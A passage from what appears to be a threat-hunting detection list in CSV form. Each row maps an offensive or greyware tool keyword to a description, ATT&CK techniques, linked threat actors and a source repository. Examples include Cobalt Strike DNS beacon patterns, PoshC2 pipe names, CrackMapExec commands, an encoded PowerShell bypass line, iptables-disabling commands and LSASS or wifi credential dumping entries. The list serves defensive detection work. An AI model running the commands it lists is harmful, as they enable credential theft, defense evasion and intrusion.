FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\adhunt.py,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,0,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -\jaccdpqnvbrrxlaf*,offensive_tool_keyword,poshc2,pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,pipe names (sysmon EID 17 - 18),10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -\kali-linux-2023*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -\NtRemoteLoad.exe*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,0,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z -\Posh*,offensive_tool_keyword,poshc2,pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,pipe names (sysmon EID 17 - 18),10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -afrog -*,offensive_tool_keyword,afrog,A tool for finding vulnerabilities,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/zan8in/afrog,1,0,N/A,N/A,10,2135,272,2023-09-28T09:41:46Z,2022-02-24T06:00:32Z -BypassUAC *,offensive_tool_keyword,covenant,Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -capinfos -*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -captype -*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -cd PayGen,offensive_tool_keyword,PayGen,FUD metasploit Persistence RAT,T1587 T1048 T1588 T1102 T1041,N/A,N/A,N/A,RAT,https://github.com/youhacker55/PayGen,1,0,N/A,N/A,,N/A,,, -certipy *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -chkconfig off ip6tables,greyware_tool_keyword,iptables,Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -chkconfig off iptables,greyware_tool_keyword,iptables,Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc *,greyware_tool_keyword,powershell,Jenkins Abuse Without admin access,T1210.002 - T1078.003 - T1046,TA0001 - TA0007 - TA0040,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -cme smb *,offensive_tool_keyword,crackmapexec,crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -cme smb -*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -cme winrm *,offensive_tool_keyword,crackmapexec,crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -dcenum *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -delete_file *.dll,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -detect-hooks,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/Detect-Hooks,1,0,N/A,10,10,138,28,2021-07-22T20:13:16Z,2021-07-22T18:58:23Z -doc.1a.*\.*,offensive_tool_keyword,cobaltstrike,dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,dns query field,10,10,N/A,N/A,N/A,N/A -doc.4a.*\.*,offensive_tool_keyword,cobaltstrike,dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,dns query field,10,10,N/A,N/A,N/A,N/A -doc.bc.*\.*,offensive_tool_keyword,cobaltstrike,dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,dns query field,10,10,N/A,N/A,N/A,N/A -doc.md.*\.*,offensive_tool_keyword,cobaltstrike,dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,dns query field,10,10,N/A,N/A,N/A,N/A -doc.po.*\.*,offensive_tool_keyword,cobaltstrike,dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,dns query field,10,10,N/A,N/A,N/A,N/A -doc.tx.*\.*,offensive_tool_keyword,cobaltstrike,dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,dns query field,10,10,N/A,N/A,N/A,N/A -doc-stg-prepend*.*,offensive_tool_keyword,cobaltstrike,dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,dns query field,10,10,N/A,N/A,N/A,N/A -doc-stg-sh*.*,offensive_tool_keyword,cobaltstrike,dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,dns query field,10,10,N/A,N/A,N/A,N/A -dumpwifi *,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,0,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -etw stop,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,0,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -EVUAC *,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/TrustedPath-UACBypass-BOF,1,0,N/A,10,10,104,33,2021-08-16T07:49:55Z,2021-08-07T03:40:33Z -exploit -j -z,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -fw_walk display*,offensive_tool_keyword,cobaltstrike,A BOF to interact with COM objects associated with the Windows software firewall.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Firewall_Walker_BOF,1,0,N/A,10,10,98,13,2021-10-10T03:28:27Z,2021-10-09T05:17:10Z -fw_walk status*,offensive_tool_keyword,cobaltstrike,A BOF to interact with COM objects associated with the Windows software firewall.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Firewall_Walker_BOF,1,0,N/A,10,10,98,13,2021-10-10T03:28:27Z,2021-10-09T05:17:10Z -fw_walk total*,offensive_tool_keyword,cobaltstrike,A BOF to interact with COM objects associated with the Windows software firewall.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 